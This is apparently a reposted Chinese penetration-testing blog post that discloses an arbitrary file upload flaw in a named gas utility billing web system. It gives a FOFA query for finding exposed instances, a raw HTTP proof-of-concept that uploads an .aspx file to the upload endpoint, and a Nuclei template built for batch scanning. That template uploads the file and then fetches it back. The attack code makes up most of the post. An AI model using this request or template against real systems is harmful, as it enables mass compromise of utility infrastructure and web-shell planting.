某燃气收费系统文件上传漏洞

2024年1月10日13:02:48评论80 views字数 2126阅读7分5秒阅读模式

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

某燃气收费系统文件上传漏洞

三、资产梳理：

fofa：app="先锋WEB燃气收费系统"

四、漏洞复现：

某燃气收费系统文件上传漏洞

五、POC：

GET /AjaxService/Upload.aspx HTTP/1.1Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------352149293954742437289922451Content-Length: 351Origin: nullConnection: closeUpgrade-Insecure-Requests: 1-----------------------------352149293954742437289922451Content-Disposition: form-data; name="Fdata"; filename="123.aspx"Content-Type: application/octet-streamhello-----------------------------352149293954742437289922451Content-Disposition: form-data; name="submit"Submin-----------------------------352149293954742437289922451--

nuclei批量

id: xianfeng_files_uploadinfo:  name: xianfeng_files_upload  author: joyboy  severity: critical  description: 先锋WEB燃气收费系统文件上传漏洞  metadata:    max-request: 1    fofa-query: app="先锋WEB燃气收费系统"    verified: true  tags: rcerequests:  - raw:      - |-        POST /AjaxService/Upload.aspx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0        Content-Type: multipart/form-data; boundary=---------------------------352149293954742437289922451        Content-Length: 349        Origin: null        Connection: close        Upgrade-Insecure-Requests: 1        -----------------------------352149293954742437289922451        Content-Disposition: form-data; name="Fdata"; filename="123.aspx"        Content-Type: application/octet-stream        hello        -----------------------------352149293954742437289922451        Content-Disposition: form-data; name="submit"        Submin        -----------------------------352149293954742437289922451--      - |-        GET /UploadFile/{{date_time("%Y%M")}}/{{timestrp}} HTTP/1.1        Host: {{Hostname}}    extractors:      - type: regex        name: timestrp        internal: true        part: body        regex:          - '[0-9]{16}.aspx'     matchers-condition: and    matchers:      - type: word        part: body_2        words:          - hello      - type: status        status:          - 200

某燃气收费系统文件上传漏洞

原文始发于微信公众号（fly的渗透学习笔记）：某燃气收费系统文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

某燃气收费系统文件上传漏洞

世纪信通-LoginForm2-sql注入漏洞复现

用友crm客户关系管理pub/downloadfile.php接口存在任意文件读取漏洞

CVE-2024-33786 中城科信票务管理平台任意文件上传

CVE-2024-1512

CVE-2024-1698

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

发表评论

在线咨询

微信